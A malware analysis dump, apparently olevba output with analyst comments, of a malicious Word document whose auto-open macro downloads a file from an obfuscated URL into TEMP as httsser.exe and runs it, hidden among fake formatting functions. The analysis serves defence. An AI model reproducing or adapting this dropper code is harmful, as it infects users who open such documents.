dynamoo

Malicious Word macro

Oct 30th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIH--V purcha~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: purcha~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: purcha~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      ' Analyst note: auto-executing entry point (olevba flags AutoOpen as AutoExec below);
      ' it runs when the document is opened with macros enabled.
      ' The five calls are the whole download-and-run chain. The procedure names look like
      ' ordinary template/formatting helpers, but in this dump they do the following:
      '   getDotPath     - creates the XMLHTTP, ADODB.Stream, Shell.Application and
      '                    WScript.Shell environment objects, then exits
      '   AutoFormatOff  - opens the stream in binary mode, reads TEMP, prepares a GET request
      '   ToolbarInit    - sets the output path to TEMP + "\httsser.exe" and sends the request
      '   RibbonOnLoad   - writes the HTTP response body to that path (argument is unused)
      '   CreateStyleImg - hands the saved path to Shell.Application.Open via its error handler
  17. getDotPath
  18. AutoFormatOff
  19. ToolbarInit
  20. RibbonOnLoad ""
  21. CreateStyleImg
  22. End Sub
  23.  
  24.  
  25.  
  26. -------------------------------------------------------------------------------
  27. VBA MACRO Module1.bas
  28. in file: purcha~1.doc - OLE stream: u'Macros/VBA/Module1'
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30.  
  31.  
  32. Function CreateStyle(Optional overwriteIfStyleExists As Boolean = False)
  33.  On Error GoTo CreateStyleAdding
  34.  Set mystyle = ActiveDocument.Styles("")
  35.  If overwriteIfStyleExists = True Then
  36.  GoTo CreateStyleOverwrite
  37.  End If
  38.  Exit Function
  39. CreateStyleAdding:
  40.  Set mystyle = ActiveDocument.Styles.Add(Name:="", Type:=wdStyleTypeParagraph)
  41. CreateStyleOverwrite:
  42.  
  43.  
  44.  mystyle.BaseStyle = ActiveDocument.Styles(WdBuiltinStyle.wdStyleNormal)
  45.  mystyle.AutomaticallyUpdate = True
  46.  With mystyle.Font
  47.  .Name = ""
  48.  .Size = 9
  49.  .Hidden = False
  50.  .Hidden = True
  51.  .Color = wdColorGreen
  52.  End With
  53.  
  54.  mystyle.NoProofing = True
  55.  With mystyle.ParagraphFormat
  56.  With .Shading
  57.  .Texture = wdTextureNone
  58.  .ForegroundPatternColor = wdColorAutomatic
  59.  .BackgroundPatternColor = wdColorLightGreen
  60.  End With
  61.  .LineSpacingRule = wdLineSpaceSingle
  62.  
  63.  .SpaceBefore = 0
  64.  .SpaceBeforeAuto = False
  65.  .SpaceAfter = 0
  66.  .SpaceAfterAuto = False
  67.  .LineSpacingRule = wdLineSpaceSingle
  68.  .Alignment = wdAlignParagraphLeft
  69.  .LineUnitBefore = 0
  70.  .LineUnitAfter = 0
  71.  .LeftIndent = CentimetersToPoints(0)
  72.  
  73.  With .Shading
  74.  .Texture = wdTextureNone
  75.  .ForegroundPatternColor = wdColorAutomatic
  76.  .BackgroundPatternColor = 12254650
  77.  
  78.  End With
  79.  With .Borders(wdBorderLeft)
  80.  .LineStyle = wdLineStyleDashLargeGap
  81.  .LineWidth = wdLineWidth050pt
  82.  .Color = 3910491
  83.  End With
  84.  With .Borders(wdBorderRight)
  85.  .LineStyle = wdLineStyleDashLargeGap
  86.  .LineWidth = wdLineWidth050pt
  87.  .Color = 3910491
  88.  End With
  89.  With .Borders(wdBorderTop)
  90.  .LineStyle = wdLineStyleDashLargeGap
  91.  .LineWidth = wdLineWidth050pt
  92.  .Color = 3910491
  93.  End With
  94.  With .Borders(wdBorderBottom)
  95.  .LineStyle = wdLineStyleDashLargeGap
  96.  .LineWidth = wdLineWidth050pt
  97.  .Color = 3910491
  98.  End With
  99.  With .Borders
  100.  .DistanceFromTop = 1
  101.  .DistanceFromLeft = 4
  102.  .DistanceFromBottom = 1
  103.  .DistanceFromRight = 4
  104.  .Shadow = False
  105.  End With
  106.  End With
  107.  
  108.  
  109.  mystyle.NoSpaceBetweenParagraphsOfSameStyle = False
  110.  mystyle.ParagraphFormat.TabStops.ClearAll
  111.  mystyle.ParagraphFormat.TabStops.Add Position:= _
  112.  CentimetersToPoints(1), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  113.  mystyle.ParagraphFormat.TabStops.Add Position:= _
  114.  CentimetersToPoints(2), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  115.  mystyle.ParagraphFormat.TabStops.Add Position:= _
  116.  CentimetersToPoints(3), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  117.  mystyle.ParagraphFormat.TabStops.Add Position:= _
  118.  CentimetersToPoints(4), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  119.  
  120.  
  121. End Function
  122.  
  123.  
  124. Public Function CreateStyleImg()
       ' Analyst note: the style handling here is a pretext; the effective code is the
       ' error handler at CreateStyleImgAdding.
  125.  
  126.  On Error GoTo CreateStyleImgAdding
       ' Looking up a style with an empty name presumably raises an error, which transfers
       ' control to CreateStyleImgAdding - confirm in a sandbox if the exact path matters.
  127.  Set mystyle = ActiveDocument.Styles("")
  128.  mystyle.Font.Hidden = False
  129.  On Error GoTo CreateStyleSkip
  130.  mystyle.BaseStyle = ActiveDocument.Styles("")
  131. CreateStyleSkip:
  132.  On Error GoTo 0
  133.  Exit Function
  134. CreateStyleImgAdding:
       ' ActiveDocumentContent is the Shell.Application object created in getDotPath;
       ' styleContainer is the TEMP + "\httsser.exe" path set in ToolbarInit.
       ' Open on that path launches the file that RibbonOnLoad saved.
  135. ActiveDocumentContent.Open (styleContainer)
  136. Exit Function
       ' Unreachable: the two statements below follow Exit Function with no label before them.
  137.  Set mystyle = ActiveDocument.Styles.Add(Name:="", Type:=wdStyleTypeParagraph)
  138.  mystyle.AutomaticallyUpdate = True
  139. End Function
  140.  
  141.  
  142.  
  143. Function ShowPlantuml()
  144.  DoubleCheckStyle
  145.  
  146.  
  147.  
  148.  ActiveDocument.Bookmarks.Add Name:="", Range:=Selection.Range
  149.  
  150.  Set mystyle = ActiveDocument.Styles("")
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  Call ShowHiddenText
  159.  
  160.  
  161.  Selection.GoTo What:=wdGoToBookmark, Name:=""
  162.  ActiveDocument.Bookmarks(Index:="").Delete
  163.  
  164. End Function
  165.  
  166.  
  167.  
  168.  
  169. Function HidePlantuml()
  170.  DoubleCheckStyle
  171.  
  172.  
  173.  ActiveDocument.Bookmarks.Add Name:="", Range:=Selection.Range
  174.  
  175.  Set mystyle = ActiveDocument.Styles("")
  176.  
  177.  
  178.  
  179.  
  180.  
  181.  
  182.  
  183.  Call HideHiddenText
  184.  
  185.  
  186.  Selection.GoTo What:=wdGoToBookmark, Name:=""
  187.  ActiveDocument.Bookmarks(Index:="").Delete
  188.  
  189. End Function
  190.  
  191.  
  192. Function HideHiddenText()
  193.  ActiveDocument.ActiveWindow.View.ShowAll = False
  194.  ActiveDocument.ActiveWindow.View.ShowHiddenText = False
  195.  On Error GoTo endHidden
  196.  With ActiveDocument.Styles("")
  197.  .Font.Hidden = True
  198.  End With
  199. endHidden:
  200.  On Error Resume Next
  201. End Function
  202.  
  203.  
  204. Function ShowHiddenText()
  205.  ActiveDocument.ActiveWindow.View.ShowAll = False
  206.  ActiveDocument.ActiveWindow.View.ShowHiddenText = True
  207.  
  208.  On Error GoTo endShow
  209.  With ActiveDocument.Styles("")
  210.  .Font.Hidden = False
  211.  End With
  212. endShow:
  213.  On Error Resume Next
  214. End Function
  215.  
  216.  
  217. Function SwitchP()
  218.  flag = Not (ActiveDocument.ActiveWindow.View.ShowTabs)
  219.  ActiveDocument.ActiveWindow.View.ShowParagraphs = flag
  220.  ActiveDocument.ActiveWindow.View.ShowTabs = flag
  221.  ActiveDocument.ActiveWindow.View.ShowSpaces = flag
  222.  ActiveDocument.ActiveWindow.View.ShowHyphens = flag
  223.  ActiveDocument.ActiveWindow.View.ShowAll = False
  224. End Function
  225.  
  226.  
  227.  
  228.  
  229. Function LoadTextFile(sFile) As String
  230.  Dim iFile As Integer
  231.  
  232.  On Local Error Resume Next
  233.  
  234.  iFile = FreeFile
  235.  
  236.  
  237.  Open sFile For Input As #iFile
  238.  
  239.  
  240.  LoadTextFile = Input$(LOF(iFile), iFile)
  241.  
  242.  Close #iFile
  243.  
  244. End Function
  245.  
  246.  
  247.  
  248. Sub ISwitchP(ByVal Control As IRibbonControl)
  249.  SwitchP
  250. End Sub
  251.  
  252. Sub IShowPlantUML(ByVal Control As IRibbonControl)
  253.  ShowPlantuml
  254.  
  255. End Sub
  256.  
  257. Sub IHidePlantUML(ByVal Control As IRibbonControl)
  258.  HidePlantuml
  259.  
  260. End Sub
  261.  
  262. Sub IUML1(ByVal Control As IRibbonControl)
  263.  Macro_UML ("")
  264.  
  265. End Sub
  266. Sub IUMLAll(ByVal Control As IRibbonControl)
  267.  Macro_UML ("")
  268. End Sub
  269.  
  270. Sub IAutoFormatOn(ByVal Control As IRibbonControl)
  271.  AutoFormatOn
  272. End Sub
  273. Sub IAutoFormatOff(ByVal Control As IRibbonControl)
  274.  AutoFormatOff
  275. End Sub
  276.  
  277. Sub IPlantUMLInteractive(ByVal Control As IRibbonControl)
  278.  With frmPlantUMLInteractive
  279.  
  280.  
  281.  .tbPlantCode.Text = Replace(Macro_UML(""), vbLf, vbCrLf)
  282.  
  283.  .Show
  284.  
  285.  End With
  286.  
  287. End Sub
  288.  
  289.  
  290.  
  291.  
  292.  
  293. Sub IPreferences(ByVal Control As IRibbonControl)
  294.  Dim info As String
  295.  info = "" & vbCrLf & _
  296.  "" & vbCrLf & _
  297.  "" & getDotPath() & vbCrLf & _
  298.  "" & getJarPath()
  299.  
  300.  If RegKeyRead("") = "" Then
  301.  vectorgraphics = True
  302.  End If
  303.  If RegKeyRead("") = "" Then
  304.  useFTP = True
  305.  End If
  306.  FTPURL = RegKeyRead("")
  307.  
  308.  With PrefsForm
  309.  If vectorgraphics = True Then
  310.  .btnVectorGraphics.Caption = ""
  311.  Else
  312.  .btnVectorGraphics.Caption = ""
  313.  End If
  314.  If useFTP = True Then
  315.  .btnFTP.Caption = ""
  316.  Else
  317.  .btnFTP.Caption = ""
  318.  End If
  319.  
  320.  .info.Caption = info
  321.  .Show
  322.  RegKeySave "", .btnVectorGraphics.Caption
  323.  RegKeySave "", .btnFTP.Caption
  324.  RegKeySave "", .tbURL.Text
  325.  
  326.  
  327.  vectorgraphics = (.btnVectorGraphics.Caption = "")
  328.  useFTP = (.btnFTP.Caption = "")
  329.  FTPURL = (.tbURL.Text)
  330.  
  331.  End With
  332. End Sub
  333.  
  334. Public Sub AutoFormatOff()
       ' Analyst note: despite the name, no AutoFormat option is changed on the executed
       ' path; the routine prepares the download and leaves at the Exit Sub below.
  335.  Dim OpenType() As Variant
       ' Integer-encoded string, decoded at runtime by GetStringFromArray(OpenType, 48).
       ' With a zero-based array the first seven values decode to "http://", so this is
       ' the download URL. It is not listed in olevba's IOC table on this page, which
       ' only reports httsser.exe.
  336.  OpenType = Array(344, 373, 390, 403, 366, 372, 389, 461, 473, 444, 459, 473, 552, 566, 588, 612, 632, 574, 650, 674, 695, 713, 719, 741, 751, 711, 782, 800, 763, 785, 803, 888, 835, 903, 869, 887, 954, 916, 941, 1009, 1024, 989, 1073, 1084, 1088, 1051, 1123, 1159, 1157)
       ' PhotoshopExtension is the ADODB.Stream created in getDotPath; Type = 1 is
       ' adTypeBinary, i.e. the stream will hold raw bytes.
  337. With PhotoshopExtension
  338.    .Type = 1
  339.     .Open
  340.     End With
       ' EchoProcessor is WScript.Shell's process environment; this reads the TEMP directory.
  341.     tempFolder = EchoProcessor("TEMP")
  342.    
       ' GatewayResolver is the XMLHTTP object; the third argument False makes the request
       ' synchronous. The request is only prepared here - Send is issued in ToolbarInit.
  343. GatewayResolver.Open "GET", GetStringFromArray(OpenType, 48), False
  344.  
  345.     Exit Sub
       ' Unreachable: everything after Exit Sub is leftover formatting code that never runs.
  346.  With options
  347.  .AutoFormatAsYouTypeReplaceQuotes = False
  348.  .AutoFormatAsYouTypeReplaceSymbols = False
  349.  .AutoFormatAsYouTypeReplacePlainTextEmphasis = False
  350.  .AutoFormatAsYouTypeDefineStyles = False
  351.  .TabIndentKey = True
  352.  End With
  353. End Sub
  354.  
  355. Sub AutoFormatOn()
  356.  
  357.  With options
  358.  .AutoFormatAsYouTypeReplaceQuotes = True
  359.  .AutoFormatAsYouTypeReplaceSymbols = True
  360.  .AutoFormatAsYouTypeReplacePlainTextEmphasis = True
  361.  .AutoFormatAsYouTypeDefineStyles = True
  362.  .TabIndentKey = True
  363.  End With
  364. End Sub
  365.  
  366.  
  367.  
  368. -------------------------------------------------------------------------------
  369. VBA MACRO Module2.bas
  370. in file: purcha~1.doc - OLE stream: u'Macros/VBA/Module2'
  371. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  372.  
  373.  
  374. Const startuml = ""
  375. Const enduml = ""
  376.  
  377. Dim vectorgraphics As Boolean
  378. Dim useFTP As Boolean
  379. Dim FTPURL As String
  380.  
  381.  
  382.  
  383.  
  384.  
  385. Public Sub RibbonOnLoad(ribbon As String)
       ' Analyst note: not a ribbon callback in practice - autoopen calls it with "" and
       ' the ribbon argument is never read.
       ' Writes the raw HTTP response body (GatewayResolver = XMLHTTP) into the binary
       ' ADODB.Stream, then saves it to styleContainer (TEMP + "\httsser.exe").
       ' The second argument 2 is adSaveCreateOverWrite, so an existing file is replaced.
       ' There is no check of the HTTP status or of the content before it is written.
  386.     PhotoshopExtension.write GatewayResolver.responseBody
  387.     PhotoshopExtension.savetofile styleContainer, 2
  388. End Sub
  389.  
  390. Function get_gfx_extension() As String
  391.  If vectorgraphics Then
  392.  get_gfx_extension = ""
  393.  Else
  394.  get_gfx_extension = ""
  395.  End If
  396. End Function
  397.  
  398.  
  399. Function get_plantuml_options() As String
  400.  Dim options As String
  401.  options = ""
  402.  If vectorgraphics Then
  403.  options = options + ""
  404.  End If
  405.  
  406.  get_plantuml_options = options
  407. End Function
  408.  
  409. Function getExePath(searchfor As String, ByRef try As String) As String
  410.  Set fs = CreateObject("")
  411.  
  412.  nbTemplates = ActiveDocument.Parent.Templates.Count
  413.  mainPath = ActiveDocument.Path
  414.  try = ActiveDocument.Path & ""
  415.  
  416.  nb = InStrRev(mainPath, "")
  417.  Do While nb > 1 And fs.FileExists(mainPath + searchfor) = False
  418.  mainPath = Left(mainPath, nb - 1)
  419.  try = try & vbCrLf & mainPath & ""
  420.  nb = InStrRev(mainPath, "")
  421.  Loop
  422.  
  423.  For i = 1 To nbTemplates
  424.  If fs.FileExists(mainPath + searchfor) = False Then
  425.  mainPath = ActiveDocument.Parent.Templates.Item(i).Path
  426.  try = try & vbCrLf & ActiveDocument.Parent.Templates.Item(i).Path & ""
  427.  nb = InStrRev(mainPath, "")
  428.  Do While nb > 1 And fs.FileExists(mainPath + searchfor) = False
  429.  mainPath = Left(mainPath, nb - 1)
  430.  try = try & vbCrLf & mainPath & ""
  431.  nb = InStrRev(mainPath, "")
  432.  Loop
  433.  End If
  434.  Next i
  435.  
  436.  If fs.FileExists(mainPath + searchfor) Then
  437.  getExePath = mainPath
  438.  Else
  439.  getExePath = "" & vbCrLf & try
  440.  End If
  441.  
  442.  
  443. End Function
  444.  
  445.  
  446.  
  447. Function getJarPath() As String
  448.  Set fs = CreateObject("")
  449.  Dim trypath As String
  450.  trypath = ""
  451.  jarPath = getExePath("", trypath)
  452.  If (jarPath <> "") And fs.FileExists(jarPath + "") Then
  453.  getJarPath = jarPath
  454.  Else
  455.  getJarPath = "" & vbCrLf & trypath
  456.  End If
  457.  
  458. End Function
  459.  
  460.  
  461.  
  462.  
  463.  
  464. Public Function getDotPath()
       ' Analyst note: on the executed path this function only instantiates the four COM
       ' objects used by the rest of the chain and stores them in the Module3 globals.
       ' The ProgID "Microsoft.XMLHTTP" is split with "+" so the literal does not appear
       ' in one piece; olevba reports it as a VBA string expression in the table below.
  465. Set GatewayResolver = CreateObject("Microsoft" + ".XMLHTTP")
       ' Binary stream used to write the download to disk.
  466. Set PhotoshopExtension = CreateObject("Adodb.Stream")
       ' Used in CreateStyleImg to open (launch) the saved file.
  467. Set ActiveDocumentContent = CreateObject("Shell.Application")
       ' Process-level environment collection; AutoFormatOff reads "TEMP" from it.
  468. Set EchoProcessor = CreateObject("WScript.Shell").Environment("Process")
  469.  Dim trypath As String
  470.  Dim searchfor As String
  471.  Exit Function
       ' Unreachable: the path-lookup code below follows an unconditional Exit Function.
       ' Its string literals are empty in this dump.
  472.  trypath = Environ("")
  473.  If Environ("") <> "" Then Exit Function
  474.  searchfor = ""
  475.  dotPath = getExePath(searchfor, trypath)
  476.  If (dotPath <> "") And fs.FileExists(dotPath + searchfor) Then
  477.  getDotPath = dotPath + searchfor
  478.  Else
  479.  getDotPath = ""
  480.  End If
  481. End Function
  482.  
  483.  
  484.  
  485.  
  486. Sub ShowPlantumlJarPath()
  487.  Set fs = CreateObject("")
  488.  jarPath = getJarPath()
  489.  If jarPath <> "" And fs.FileExists(jarPath) Then
  490.  MsgBox "" & jarPath
  491.  Else
  492.  MsgBox jarPath
  493.  End If
  494. End Sub
  495.  
  496.  
  497. Sub RemoveOldVersionPlantUMLSyles()
  498.  On Error GoTo DeleteEnd
  499.  ActiveDocument.Styles("").Delete
  500.  On Error GoTo 0
  501. DeleteEnd:
  502.  On Error GoTo 0
  503.  Call Macro_UML_all
  504.  
  505. End Sub
  506.  
  507.  
  508. Sub Macro_UML_all()
  509.  Macro_UML ("")
  510. End Sub
  511.  
  512.  
  513. Sub Macro_UML_styles()
  514.  CreateStyle (True)
  515. End Sub
  516.  
  517.  
  518.  
  519. Function Macro_UML_parg()
  520.  Macro_UML ("")
  521. End Function
  522.  
  523.  
  524. Function WriteToFile(sFile, sText As String)
  525.  Dim objStream As Object
  526.  Set objStream = CreateObject("")
  527.  With objStream
  528.  .Type = 2
  529.  .Mode = 3
  530.  
  531.  .Charset = ""
  532.  .Open
  533.  .WriteText sText
  534.  .savetofile sFile, 2
  535.  End With
  536. End Function
  537.  
  538.  
  539.  
  540. -------------------------------------------------------------------------------
  541. VBA MACRO Module3.bas
  542. in file: purcha~1.doc - OLE stream: u'Macros/VBA/Module3'
  543. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  544. Public GatewayResolver As Object
       ' Analyst note: module-level state shared by the download chain; the names are
       ' misleading. Assignments seen in this dump:
       '   GatewayResolver       - Microsoft.XMLHTTP object (set in getDotPath)
       '   PhotoshopExtension    - ADODB.Stream object (set in getDotPath)
       '   EchoProcessor         - WScript.Shell process environment (set in getDotPath)
       '   tempFolder            - value of TEMP (set in AutoFormatOff)
       '   styleContainer        - tempFolder + "\httsser.exe" (set in ToolbarInit)
       '   ActiveDocumentContent - Shell.Application object (set in getDotPath)
  545. Public PhotoshopExtension As Object
  546. Public EchoProcessor As Object
  547. Public tempFolder As String
  548. Public styleContainer As String
  549. Public ActiveDocumentContent As Object
  550. Function Macro_UML(scope) As String
  551.  
  552.  
  553.  
  554.  
  555.  Dim currentIndex As Long
  556.  Dim ftphandle As Long
  557.  Dim JavaCommand As String
  558.  Dim GraphVizOption As String
  559.  GraphVizOption = ""
  560.  Dim scalefiles As Scripting.Dictionary
  561.  Set scalefiles = New Scripting.Dictionary
  562.  ToolbarInit
  563.  
  564.  If RegKeyRead("") = "" Then
  565.  vectorgraphics = True
  566.  End If
  567.  If RegKeyRead("") = "" Then
  568.  useFTP = True
  569.  End If
  570.  
  571.  FTPURL = RegKeyRead("", "")
  572.  
  573.  
  574.  Call CreateStyle(True)
  575.  Call CreateStyleImg
  576.  Call ShowPlantuml
  577.  
  578.  Call ShowHiddenText
  579.  Selection.Range.Select
  580.  
  581.  
  582.  
  583.  documentId = ActiveDocument.Name
  584.  documentId = Left(documentId, Len(documentId) - 4)
  585.  
  586.  
  587.  
  588.  Set fs = CreateObject("")
  589.  jarPath = getJarPath()
  590.  If (jarPath = "") Or fs.FileExists(jarPath + "") = False Then
  591.  MsgBox jarPath
  592.  GoTo Macro_UML_exit
  593.  End If
  594.  dotPath = getDotPath()
  595.  If dotPath <> "" Then
  596.  GraphVizOption = """" & dotPath & """"
  597.  End If
  598.  
  599. End Function
  600. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
       ' Analyst note: string de-obfuscation routine. Each array element is turned into one
       ' character by subtracting a fixed offset (5 * LenLen) and a position-dependent
       ' offset (17 * index), then passing the result to Chr.
       ' The only caller in this dump is AutoFormatOff, with LenLen = 48 (fixed offset 240).
       ' Because the string is computed arithmetically at runtime, it does not appear as a
       ' literal anywhere in the macro source. To recover it for blocking or hunting, apply
       ' the same arithmetic to the OpenType array offline rather than running the document.
  601.     Dim i As Integer
  602.     Dim result As String
  603.     result = ""
       ' i is both the loop counter and part of the key, so the array's lower bound matters
       ' (presumably 0, the default for Array() - confirm no Option Base is set).
  604.     For i = LBound(fromArr) To UBound(fromArr)
  605.         result = result & Chr(fromArr(i) - 5 * LenLen - i * 17)
  606.     Next i
  607.     GetStringFromArray = result
  608. End Function
  609. Public Function ActiveDocumentCon(fromArr() As Variant, LenLen As Integer) As String
  610.  
  611.  If scope = "" Then
  612.  Set parsedtext = ActiveDocument.Content
  613.  isForward = True
  614.  Else
  615.  Set parsedtext = Selection.Range
  616.  
  617.  isForward = False
  618.  End If
  619.  
  620.  parsedtext.Find.Execute FindText:=startuml, Forward:=isForward
  621.  If parsedtext.Find.Found = True Then
  622.  
  623.  Set singleparagraph = parsedtext.Paragraphs(1).Range
  624.  singleparagraph.Collapse
  625.  Else
  626.  GoTo Macro_UML_exit
  627.  End If
  628.  Application.ScreenUpdating = False
  629.  jobDone = False
  630.  If useFTP Then
  631.  ftphandle = ftpOpen(FTPURL)
  632.  If ftphandle <= 0 Then
  633.  MsgBox ""
  634.  Exit Function
  635.  End If
  636.  End If
  637.  
  638.  Do While parsedtext.Find.Found = True And _
  639.  (scope = "" Or currentIndex < 1) And Not jobDone
  640.  
  641.  
  642.  
  643.  Set currentparagraph = parsedtext.Paragraphs(1)
  644.  Set paragraphRange = currentparagraph.Range
  645.  paragraphRange.Collapse
  646.  jobDone = False
  647.  Do Until jobDone
  648.  If Left(currentparagraph.Range.Text, Len(startuml)) = startuml Then
  649.  Set paragraphRange = currentparagraph.Range
  650.  paragraphRange.Collapse
  651.  
  652.  End If
  653.  paragraphRange.MoveEnd Unit:=wdParagraph
  654.  If Left(currentparagraph.Range.Text, Len(enduml)) = enduml Then
  655.  Dim s As String
  656.  paragraphRange.Style = ""
  657.  s = paragraphRange.Text
  658.  currentIndex = currentIndex + 1
  659.  
  660.  factor = 0#
  661.  On Error Resume Next
  662.  p = InStr(LCase(s), "")
  663.  If p > 0 Then
  664.  
  665.   endscale = InStr(p + 9, s, Chr(13)) - p - 9
  666.   factorstr = Mid(s, p + 9, endscale)
  667.   factor = Val(factorstr)
  668.  End If
  669.  On Error GoTo 0
  670.  
  671.  textFileId = documentId & "" & Right("" & currentIndex, 4) & ""
  672.  If factor > 0 Then
  673.   scalefiles(Replace(textFileId, "", "")) = factor
  674.  End If
  675.  If scope = "" Then
  676.   Macro_UML = Mid(s, 1, Len(s) - 1)
  677.   Application.ScreenUpdating = True
  678.   Exit Function
  679.  End If
  680.  FileName = jarPath & "" & textFileId
  681.  
  682.  WriteToFile FileName, Mid(s, 1, Len(s) - 1)
  683.  If useFTP Then
  684.   retValue = FtpStor(ftphandle, jarPath & "" & textFileId, textFileId)
  685.  End If
  686.  
  687.  If scope <> "" Then
  688.   jobDone = True
  689.  End If
  690.  
  691.  End If
  692.  Set currentparagraph = currentparagraph.Next
  693.  If currentparagraph Is Nothing Then
  694.  jobDone = True
  695.  End If
  696.  Loop
  697.  parsedtext.Collapse Direction:=wdCollapseEnd
  698.  If scope = "" Then
  699.  parsedtext.Find.Execute FindText:=startuml, Forward:=True
  700.  End If
  701.  Loop
  702.  Application.ScreenUpdating = True
  703.  
  704.  
  705.  
  706.  
  707.  
  708.  
  709.  
  710.  
  711.  
  712.  
  713.  
  714.  
  715.  If useFTP Then
  716.  For i = 1 To currentIndex
  717.  imageId = documentId & "" & Right("" & i, 4) & ""
  718.  imageName = jarPath & "" & imageId
  719.  retValue = FtpRetr(ftphandle, imageName, imageId)
  720.  Next i
  721.  
  722.  Else
  723.  
  724.  
  725.  
  726.  
  727.  Dim javaoptions
  728.  If ActiveDocument.Path Like "" Or Left(ActiveDocument.Path, 1) = "" Then
  729.  javaoptions = "" & Chr(34) & ActiveDocument.Path & Chr(34) & ""
  730.  End If
  731.  
  732.  JavaCommand = "" & javaoptions _
  733.  & """" & jarPath & "" & _
  734.  jarPath & """""" & jarPath & """" & GraphVizOption & get_plantuml_options()
  735.  
  736.  
  737.  
  738.  
  739.  result = ShellAndWait(JavaCommand, 0, vbMinimizedFocus, AbandonWait)
  740.  If result <> Success Then
  741.  MsgBox ""
  742.  Return
  743.  End If
  744.  
  745.  
  746.  
  747.  Sleep 1000
  748.  End If
  749.  
  750.  
  751.  
  752.  
  753.  
  754.  jobDone = False
  755.  nrOfImages = currentIndex
  756.  currentIndex = 0
  757.  
  758.  
  759.  
  760.  
  761.  
  762.  
  763.  If useFTP Then
  764.  
  765.  Else
  766.  Do
  767.  currentIndex = currentIndex + 1
  768.  
  769.  
  770.  
  771.  
  772.  DoEvents
  773.  
  774.  Sleep 100
  775.  If fs.FileExists(jarPath & "") = False Then
  776.  jobDone = True
  777.  Exit Do
  778.  End If
  779.  If currentIndex > 30 Then
  780.  
  781.  MsgBox ("")
  782.  Exit Do
  783.  End If
  784.  Loop
  785.  
  786.  If jobDone = False Then
  787.  End
  788.  End If
  789.  End If
  790.  
  791.  
  792.  
  793.  
  794.  
  795.  If scope = "" Then
  796.  Set parsedtext = ActiveDocument.Content
  797.  isForward = True
  798.  Else
  799.  Set parsedtext = singleparagraph
  800.  isForward = True
  801.  End If
  802.  parsedtext.Find.Execute FindText:=enduml, Forward:=isForward
  803.  currentIndex = 0
  804.  bTrackRevFlag = ActiveDocument.TrackRevisions
  805.  ActiveDocument.TrackRevisions = False
  806.  Do While parsedtext.Find.Found = True And (scope = "" Or currentIndex < 1)
  807.  currentIndex = currentIndex + 1
  808.  
  809.  
  810.  
  811.  On Error GoTo LastParagraph
  812.  
  813.  
  814.  
  815.  Set currentparagraph = parsedtext.Paragraphs(1).Next.Range
  816.  Do While currentparagraph.InlineShapes.Count > 0 And currentparagraph.Style = ""
  817.  currentparagraph.Delete
  818.  Set currentparagraph = parsedtext.Paragraphs(1).Next.Range
  819.  Loop
  820.  On Error GoTo 0
  821.  Set currentRange = currentparagraph
  822.  imagesDirectory = jarPath & "" & documentId & "" & Right("" & currentIndex, 4) & get_gfx_extension()
  823.  Image = Dir(imagesDirectory)
  824.  While Image <> ""
  825.  
  826.  errorTextFile = jarPath & "" & Left(Image, Len(Image) - 4) & ""
  827.  BaseName = Left(Image, Len(Image) - 4)
  828.  Set currentparagraph = ActiveDocument.Paragraphs.Add(Range:=currentRange).Range
  829.  Set currentRange = currentparagraph.Paragraphs(1).Next.Range
  830.  currentparagraph.Style = ""
  831.  currentparagraph.Collapse
  832.  
  833.  Set Image = currentparagraph.InlineShapes.AddPicture _
  834.  (FileName:=jarPath & "" & Image _
  835.  , LinkToFile:=False, SaveWithDocument:=True)
  836.  
  837.  
  838.  If scalefiles(CStr(BaseName)) > 0.1 And scalefiles(CStr(BaseName)) < 5 Then
  839.  Image.ScaleWidth = scalefiles(CStr(BaseName)) * 100
  840.  Image.ScaleHeight = scalefiles(CStr(BaseName)) * 100
  841.  Else
  842.  
  843.  
  844.  With Image
  845.   .LockAspectRatio = msoFalse
  846.   .ScaleWidth = 100
  847.   .ScaleHeight = 100
  848.   percentW = ActiveDocument.PageSetup.TextColumns.Width / Image.Width
  849.   percentH = (ActiveDocument.PageSetup.PageHeight - ActiveDocument.PageSetup.TopMargin - ActiveDocument.PageSetup.BottomMargin) / Image.Height
  850.   If percentH < percentW Then percentW = percentH
  851.   If percentW < 1 Then
  852.   .ScaleWidth = percentW * 100
  853.   .ScaleHeight = percentW * 100
  854.   End If
  855.  End With
  856.  End If
  857.  
  858.  If fs.FileExists(errorTextFile) Then
  859.  Image.AlternativeText = LoadTextFile(errorTextFile)
  860.  Beep
  861.  Else
  862.  Image.AlternativeText = ""
  863.  End If
  864.  
  865.  If Image.ScaleHeight > 100 Or Image.ScaleWidth > 100 Then
  866.  Image.Reset
  867.  End If
  868.  Image = Dir()
  869.  Wend
  870.  parsedtext.Collapse Direction:=wdCollapseEnd
  871.  parsedtext.Find.Execute FindText:=enduml, Forward:=True
  872.  Loop
  873.  ActiveDocument.TrackRevisions = bTrackRevFlag
  874.  
  875.  
  876.  
  877.  
  878. Phase3:
  879.  
  880.  
  881.  
  882.  If Not useFTP Then
  883.  On Error Resume Next
  884.  
  885.  Kill (jarPath & "" & documentId & "")
  886.  On Error GoTo 0
  887.  Else
  888.  ftpClose ftphandle
  889.  End If
  890. Macro_UML_exit:
  891.  
  892.  
  893.  
  894.  
  895.  Call ShowHiddenText
  896.  DoubleCheckStyle
  897. Exit Function
  898.  
  899.  
  900.  
  901. LastParagraph:
